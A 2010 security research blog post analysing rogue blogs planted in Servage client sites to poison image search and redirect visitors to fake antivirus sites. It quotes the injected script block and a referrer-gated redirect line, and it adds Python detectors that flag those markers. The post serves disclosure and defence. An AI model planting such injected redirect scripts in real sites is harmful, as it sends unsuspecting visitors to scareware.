
More About the Rogue Image Blogs on Servage Network…

   04 May 10   Filed in Website exploits

This is the fifth article in the series about rogue blogs created by hackers inside legitimate websites of Servage clients. Millions of malicious web pages have seriously poisoned Google search results, redirecting visitors to scareware sites. You might want to read the previous posts first:

In this post, I’ll describe how the new generation of rogue blogs works.

Some history

Hackers exploited some security hole of the Servage hosting provider and created rogue blogs deep in the directory structure of thousands of legitimate websites of Servage clients. Depending on the generation of the attack, hackers used one of the following names for the blog subdirectories: blog, bmblog, bsblog, bmsblog, mdblog.

Examples:

example.com/proofs/tpl/mdblog
example.org/img/images/bmblog
example.net/gallery/albums/bsblog

However, when security researchers found and described this malicious network of blogs, Google started to actively remove them from its index. For example, the allinurl:bmblog/category search returned almost 300,000 results in November and today it returns only 6 results.

In November 2009, cybercrooks began to roll out the new type of spammy blogs that will be described here.

Hotlinking and keyword stuffing

The blog posts hotlink 6-10 high-ranking images for a targeted query. The images are interspersed with short word combinations that contain the targeted keyword. Each word combination is wrapped in different HTML tags (supposedly, to make the keyword stuffing less obvious). Here is a short snippet of HTML for a page that targets word combinations with “Houston”:

...<p><img src="http://somesite.com/Detoxy_Foot_pads/detox_foot_pads_box.jpg" alt="houston tx band trade shows"/></p>
<p><b>Private Schools Houston</b>. <u>Ariel Photo Houston</u>. <u>Wedding Photography Houston Texas</u>. Houston Gun Shows.</p>
<p><img src="http://anothersite.com/myspace/ricksnycann_back.jpg" alt="houston texans cheerleaders"/></p>
<ul>
<li>Houston Movie Theatres</li>
<li><b>Hard Rock Cafe Houston</b></li>
<li><u>Wife Swapping Houston</u></li>
</ul>...

Apparently, this trick works. Somehow, these crappy blogs with zero original content and no inbound links make it into the first pages of Google image search results and prevail there (sometimes occupying up to 100% of the positions), crowding out previously high-ranking sites with the original content. (@Google: I hope you are already working on the Image search update that addresses this issue.)

FlatPress blogging engine

In this generation of the attack, they changed the blogging engine. The new blogs are powered by FlatPress 0.909.

Here’s the description of this engine that I found on its site:

FlatPress is an open-source standard-compliant multi-lingual extensible blogging engine which does not require a DataBase Management System to work.
You don’t need MySQL because FlatPress stores all of its content on text files.
All you need is some web space supporting PHP4 (or later).

  • Standard-compliant (XHTML valid)
  • Plugin support
  • Widget system
  • Easy to customize with themes (powered by Smarty)

This is a more powerful and flexible engine that (like the previous engine) doesn’t require a database and thus is very easy to configure and can be installed on almost any hosting with PHP support. At the same time it supports SEO-friendly URLs (pretty URLs) and custom themes, which make different blogs look different (and less suspicious).

URL structure

These new blogs are installed in first-level subdirectories of legitimate sites. The names of the subdirectories consist of some word (usually a human name) and some 4-5 digit number (this number seems to be unique throughout all the rogue blogs).

example.com/sarah5689/
example.net/learn2463/
example.org/gulf4645/

Sometimes there may be more than one rogue blog installed in different subdirectories of the same site.

Since the blogs are powered by FlatPress, they all have FlatPress specific URL structure, which made it easy to come up with allinurl: Google searches that helped reveal thousands of such malicious blogs.

Individual posts have the following URL structure:

/?x=entry:entryYYMMDD-HHMMSS, where YYMMDD-HHMMSS is the date and the time of the post.

For example: /after6031/?x=entry:entry100405-151819 – this post was published on April 5, 2010 at 15:18.

The blogs also have archive pages that list all posts (4-5 posts per page) for specified periods. They have the following URL structure:

/?x=y:YY;m:MM – archive of posts published in MM month of YY year.

For example:

/?x=y:09;m:12 – archive of posts published in December of 2009
/?x=y:10;m:04 – archive of posts published in April of 2010

To access a particular archive page, add the &paged parameter:

/?x=y:10;m:04&paged=2 – the second page of the archive of posts published in April of 2010
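The URL structure above is easy to match mechanically, which is useful for a webmaster who wants to check access logs for hits on a rogue blog. The following is an added example (not code from the original post): it recognises the first-level “word plus 4-5 digits” directory and the FlatPress entry/archive query strings, and decodes the publication time from the entry id. The log lines are constructed samples; the directory regex is an indicator, so a legitimate directory such as images2010 would also be reported.

```python
import re
from datetime import datetime

# Directory name pattern of this generation: a word plus a 4-5 digit number
ROGUE_DIR = re.compile(r"^/(?P<dir>[a-z]+\d{4,5})/")
# FlatPress single-post URL: /?x=entry:entryYYMMDD-HHMMSS
ENTRY = re.compile(r"[?&]x=entry:entry(?P<ts>\d{6}-\d{6})")
# FlatPress archive URL: /?x=y:YY;m:MM, optionally followed by &paged=N
ARCHIVE = re.compile(r"[?&]x=y:(?P<yy>\d{2});m:(?P<mm>\d{2})(?:&paged=(?P<page>\d+))?")
# Request path from a common/combined access-log line
REQ = re.compile(r'"(?:GET|POST|HEAD) (?P<path>\S+) HTTP/')

def classify(path):
    """Describe a request path that matches the rogue-blog URL structure, else None."""
    m = ROGUE_DIR.match(path)
    if not m:
        return None
    info = {"dir": m.group("dir"), "kind": "other"}
    e = ENTRY.search(path)
    if e:
        info["kind"] = "entry"
        # The entry id encodes the post's publication date and time
        info["published"] = datetime.strptime(e.group("ts"), "%y%m%d-%H%M%S")
        return info
    a = ARCHIVE.search(path)
    if a:
        info["kind"] = "archive"
        info["year"] = 2000 + int(a.group("yy"))
        info["month"] = int(a.group("mm"))
        info["page"] = int(a.group("page") or 1)
    return info

def scan_log(text):
    """Return a classification dict for every log line that hits a rogue-blog URL."""
    hits = []
    for line in text.splitlines():
        r = REQ.search(line)
        info = classify(r.group("path")) if r else None
        if info:
            hits.append(info)
    return hits

# Constructed access-log lines (not taken from a real server)
SAMPLE_LOG = """\
1.2.3.4 - - [05/Apr/2010:15:20:01 +0000] "GET /after6031/?x=entry:entry100405-151819 HTTP/1.1" 200 5120
1.2.3.5 - - [05/Apr/2010:15:21:13 +0000] "GET /sarah5689/?x=y:10;m:04&paged=2 HTTP/1.1" 200 8192
1.2.3.6 - - [05/Apr/2010:15:22:40 +0000] "GET /gallery/albums/ HTTP/1.1" 200 1024
1.2.3.7 - - [05/Apr/2010:15:23:02 +0000] "GET /learn2463/?x=y:09;m:12 HTTP/1.1" 200 7000
"""
```

Run `scan_log(SAMPLE_LOG)` to get three hits: one entry published 2010-04-05 15:18:19 and two archive pages; the gallery request is ignored.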

Redirects to Fake AV sites

Each blog page (except for “login” pages) contains a block of HTML code with malicious scripts (this time it is not even hidden from search engine bots):

<!-- HippoCounter -->
<script type="text/javascript">
var kc_id = '32';
</script>
<script type="text/javascript" src="hxxp://hippocounter .info/counter/counter.js"></script>
<!-- HippoCounter -->
<script type="text/javascript" src="hxxp://adstatsviewer .in/counter.js?ad=1"></script>

The first one (hippocounter) seems to be a real statistics script. However, it’s the hackers’ own statistics on their own server. It has an alternative domain name hippocounter .com that was created on January 11, 2010. When Google blacklisted the .com domain, the hackers registered the .info domain (March 3, 2010) and have used it since then. Both domains point at the same site on a server with IP 96 .9 .177 .21 (Pennsylvania – Scranton – Network Operations Center Inc).

The second script from the .in domain is the one that actually redirects visitors to scareware sites.

if (document.referrer.length > 0) {top.location.href='http://91.188.59.166/main.php?land=20&affid=95200'}
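Because the redirect above only fires when document.referrer is non-empty, a scanner that loads the page directly never sees it; the injected block and the external script have to be inspected themselves. The following is an added example (not code from the original post or from any project): given an already fetched page and, optionally, the bodies of its external scripts, it flags the HippoCounter/kc_id markers, any script not hosted on the site’s own domains, and any script that gates a location change on document.referrer. The sample HTML is constructed from the block quoted above, with the redirect target replaced by a placeholder.

```python
import re
from urllib.parse import urlparse

SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc=["\']([^"\']+)["\']', re.I)
INLINE_SCRIPT = re.compile(r"<script(?![^>]*\ssrc=)[^>]*>(.*?)</script>", re.I | re.S)
# Referrer-gated redirect, as in the adstatsviewer script quoted above
REFERRER_REDIRECT = re.compile(r"document\.referrer[\s\S]*?(?:top|window|document)\.location(?:\.href)?\s*=")
MARKERS = (
    ("hippocounter_comment", re.compile(r"<!--\s*HippoCounter\s*-->", re.I)),
    ("kc_id_var", re.compile(r"\bvar\s+kc_id\s*=")),
)

def audit_page(html, own_hosts, script_bodies=None):
    """Return (finding, detail) pairs for one fetched page; script_bodies maps the
    src of an external script to its fetched JavaScript text (optional)."""
    script_bodies = script_bodies or {}
    findings = []
    for name, rx in MARKERS:
        if rx.search(html):
            findings.append(("marker", name))
    for src in SCRIPT_SRC.findall(html):
        host = urlparse(src).hostname
        if host and host not in own_hosts:
            findings.append(("external_script", src))
        if REFERRER_REDIRECT.search(script_bodies.get(src, "")):
            findings.append(("referrer_redirect", src))
    for body in INLINE_SCRIPT.findall(html):
        if REFERRER_REDIRECT.search(body):
            findings.append(("referrer_redirect", "inline"))
    return findings

# Constructed sample page reproducing the injected block, plus one legitimate script
SAMPLE_HTML = """<html><body><p>Houston Movie Theatres</p>
<!-- HippoCounter -->
<script type="text/javascript">
var kc_id = '32';
</script>
<script type="text/javascript" src="http://hippocounter.info/counter/counter.js"></script>
<!-- HippoCounter -->
<script type="text/javascript" src="http://adstatsviewer.in/counter.js?ad=1"></script>
<script type="text/javascript" src="http://example.com/js/gallery.js"></script>
</body></html>"""

# Constructed body for the .in script; the redirect target is a placeholder
SAMPLE_SCRIPTS = {
    "http://adstatsviewer.in/counter.js?ad=1":
        "if (document.referrer.length > 0) {top.location.href='http://redirect-target.invalid/main.php'}",
}
```

`audit_page(SAMPLE_HTML, {"example.com"}, SAMPLE_SCRIPTS)` reports both markers, the two external scripts and the referrer-gated redirect in the .in script, while the site’s own gallery.js is not flagged.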

Latvian AS6851 (BKCNET) network

The IP address in the malicious URL changes almost every day: 91.188.59.167, 91.188.60.63, 91.188.60.63, 91.188.60.65, 91.188.60.69 etc., but they all belong to the AS6851 (BKCNET) network. This network is a known source of multiple malware attacks: malwareUrl report, Google’s Safe Browsing report.

This network is identified as Latvia Riga Docsis Ip Pool For Cable Customers. This means that most likely the IPs belong to regular users of a cable Internet Service Provider in Latvia. Moreover, the IPs are dynamically assigned from a pool of available IPs – that’s probably why hackers change them in the redirection script.

I wonder what prevents the police from catching the hackers? With cable ISPs, the physical location of the client IPs should be easily traceable. Or am I too naive?

Malicious .in domains

Let’s get back to that malicious external script found in the rogue blogs. To prevent blacklisting, hackers register new domains almost every day. They are all .in domains and they point to 5 servers on the AS47869 (NETROUTING – Netherlands) network.


Among them, there are two specialized domains: celebsfinectpics .in is used exclusively in celebsfinectpics.com sites (also 94.228.209.133) and blogpics3 .in is used in the malicious Blogger blogs.

Google Tips

When hackers create rogue content on your site in order to poison search engine results, you can use the search engine itself to discover such content.

1. Try the site: command on Google. It will display all indexed pages on your site (e.g. site:example.com – replace example.com with your own site’s domain name). If your site is relatively small and you can browse through all the search results, you’ll be able to find links to rogue web pages if Google has indexed them.

1.1. If you are a Servage client, you can use the following command to check your site for the rogue blogs described in this article: site:example.com inurl:entry (again, replace example.com with your site’s domain name)

2. Regularly check the following sections of Google Webmaster Tools: Top search queries, Keywords and Internal links – you might spot irrelevant keywords and fishy links there.

To webmasters

As you can see, if you don’t look properly after your site, don’t be surprised if you eventually find it actively abused by hackers and blacklisted by Google. And this situation with Servage shows that your hosting service provider will not look after your sites either. Moreover, some hosting providers may have serious security issues that allow hackers to mess with their clients’ sites for months and years.

If your website happens to be on a shared server, you should be prepared to deal with all sorts of security problems yourself. The key factors are regular monitoring and a reliable backup/restore strategy. This way you will be able to detect problems before they incur serious damage and easily recover your site to the most recent clean state. A clever backup/restore strategy will also help you seamlessly move to another hosting provider if you find that your current provider can’t guarantee a secure shared hosting environment.

Time to act

As a security researcher, I’m trying to unearth facts that can help all involved parties (webmasters, Servage, Google) mitigate the effects of hacker attacks. I believe that such posts can make a difference.

I hope that after reading these posts:

  • webmasters will check their sites to make sure they are not affected
  • hosting providers will try to find out whether they have similar issues on their servers or not
  • and guys from Google will try to make it harder to poison their search results, etc.

What do you think?


Reader's Comments (2)

  1.

    Thanks for the info about the Rogue Blogs.
    I was just cleaning up my old servage account before I cancel it and stumbled upon a lot of these blogs.
    This isn’t the first time I had problems with servage. My password isn’t the problem since I use random passwords like wait9ldd3aif4nej2eat7tia6 and servage never informed me of any security holes they might have had and that I should clean up my account. After the first months of servage I already started having problems but kept the account as backup, but then servage started deleting my backup files (they did notify me about that).
    Anyway, servage really is a waste of money (although they are cheap).

  2.

    Hi!

    Thank you for the information about these rogue blogs. I’m also a Servage customer, and some of my sites were also infected with these blogs.

    I did some research, and found the script/method they use to infect your site with these annoying blogs.

    If you are interested in what I’ve found, I’ll send you the details together with the script. In short, all the blogs come from hippocounter.info :(

    regards!